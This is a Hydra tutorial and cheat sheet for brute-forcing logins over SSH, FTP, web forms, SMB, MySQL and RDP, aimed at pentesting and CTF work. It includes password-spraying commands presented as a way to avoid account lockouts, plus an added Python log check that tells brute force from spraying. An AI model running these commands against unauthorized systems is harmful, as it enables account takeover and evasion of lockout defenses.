HYDRA — Practical Guide

1. INTRODUCTION

Hydra is a fast and powerful login brute-force tool.

It supports protocols such as SSH, FTP, HTTP(S), SMB, RDP, MySQL, SMTP, VNC, POP3, and many more.

It is commonly used in:

- Pentesting
- CTF brute-force challenges
- Credential auditing

2. BASIC SYNTAX

Hydra syntax patterns:

Single username + single password:

```bash
hydra -l USER -p PASS protocol://target
```

Username list + password list:

```bash
hydra -L users.txt -P passwords.txt protocol://target
```

Flags:

- -l : single username
- -L : username list
- -p : single password
- -P : password list

3. SSH BRUTE FORCE

Common SSH brute force:

```bash
hydra -L users.txt -P passwords.txt ssh://192.168.1.10
```

Single user brute force:

```bash
hydra -l admin -P rockyou.txt ssh://10.10.10.5
```

Use when SSH is open and weak credentials are suspected.


4. FTP BRUTE FORCE

Brute force FTP login:

```bash
hydra -L users.txt -P passwords.txt ftp://target.com
```

FTP often uses weak or default credentials in CTFs.


5. HTTP POST FORM BRUTE FORCE

Classic POST brute-force:

```bash
hydra -L users.txt -P passes.txt 192.168.1.20 http-post-form \
  "/login.php:user=^USER^&pass=^PASS^:F=invalid"
```

Notes:

- ^USER^ and ^PASS^ placeholders are replaced on each attempt.
- F=invalid tells Hydra what response indicates a failed login.

6. HTTP GET FORM BRUTE FORCE

GET request brute force:

```bash
hydra -L users.txt -P passes.txt target.com http-get-form \
  "/login?u=^USER^&p=^PASS^:F=incorrect"
```


7. SMB BRUTE FORCE

Brute force Windows SMB logins:

```bash
hydra -L users.txt -P passes.txt smb://10.10.10.15
```

8. MYSQL BRUTE FORCE

Brute force MySQL credentials:

```bash
hydra -l root -P passwords.txt mysql://192.168.1.50
```

9. RDP BRUTE FORCE

Brute force Windows Remote Desktop:

```bash
hydra -L users.txt -P passwords.txt rdp://10.10.10.25
```

10. SPEED AND THREAD CONTROL

Increase brute-force speed using threads:

```bash
hydra -L users.txt -P passes.txt -t 32 ssh://10.10.10.5
```

11. VERBOSE MODE & OUTPUT

Show every request:

```bash
hydra -vV ...
```

Save output to file:

```bash
hydra -L users.txt -P passes.txt ssh://10.10.10.5 -vV -o hydra_results.txt
```

12. PASSWORD SPRAYING

One password, many users:

```bash
hydra -L users.txt -p Password123 ssh://10.10.10.5
```

Useful for avoiding account lockouts.
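
The single-user run in section 3 and the spray above leave different footprints in the target's SSH logs: many failures on one account versus one or two failures on many accounts. The Python log check below is an added example, not part of the original guide; it assumes OpenSSH's "Failed password" line format, and the sample log, function names and thresholds are all constructed for illustration.

```python
import re
from collections import defaultdict

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

def _fail(user, ip, invalid=False):
    """Build one constructed OpenSSH failed-login line."""
    who = f"invalid user {user}" if invalid else user
    return f"Jan 10 09:00:00 host sshd[4242]: Failed password for {who} from {ip} port 40000 ssh2"

# Constructed sample log (not real data): one source guessing many passwords for
# "admin", one source trying a single password across five accounts, one typo.
SAMPLE_LOG = "\n".join(
    [_fail("admin", "10.10.10.99")] * 6
    + [_fail(u, "10.10.10.77", invalid=(u == "erin"))
       for u in ("alice", "bob", "carol", "dave", "erin")]
    + [_fail("alice", "192.168.1.23")]
)

def failures_by_source(log_text):
    """Return {source_ip: {username: failed_attempts}}."""
    counts = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            counts[ip][user] += 1
    return counts

def classify_sources(log_text, guess_threshold=5, user_threshold=4):
    """Label sources as 'brute-force' (deep on one account) or 'spray' (wide, shallow).
    Thresholds are illustrative; a real rule would also bound the time window."""
    verdicts = {}
    for ip, users in failures_by_source(log_text).items():
        if len(users) >= user_threshold and max(users.values()) <= 2:
            verdicts[ip] = "spray"
        elif max(users.values()) >= guess_threshold:
            verdicts[ip] = "brute-force"
    return verdicts

def locked_accounts(log_text, lockout_threshold=5):
    """Accounts a per-account lockout policy alone would have tripped."""
    per_user = defaultdict(int)
    for users in failures_by_source(log_text).values():
        for user, n in users.items():
            per_user[user] += n
    return sorted(u for u, n in per_user.items() if n >= lockout_threshold)

if __name__ == "__main__":
    print(classify_sources(SAMPLE_LOG))
    print(locked_accounts(SAMPLE_LOG))
```

On the sample, only the "admin" account reaches the lockout threshold; the spraying source is visible only when failures are grouped by source and distinct usernames are counted.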


13. CTF & PENTEST EXAMPLES

Weak SSH credentials:

```bash
hydra -l root -P rockyou.txt ssh://10.10.10.5
```

Web login brute force:

```bash
hydra -L users.txt -P passes.txt 10.10.10.8 http-post-form \
  "/index.php:username=^USER^&password=^PASS^:F=Login Failed"
```

FTP brute force:

```bash
hydra -L users.txt -P passwords.txt ftp://target.com
```

Active Directory password spraying:

```bash
hydra -L employees.txt -p Winter2024 rdp://10.0.0.15
```
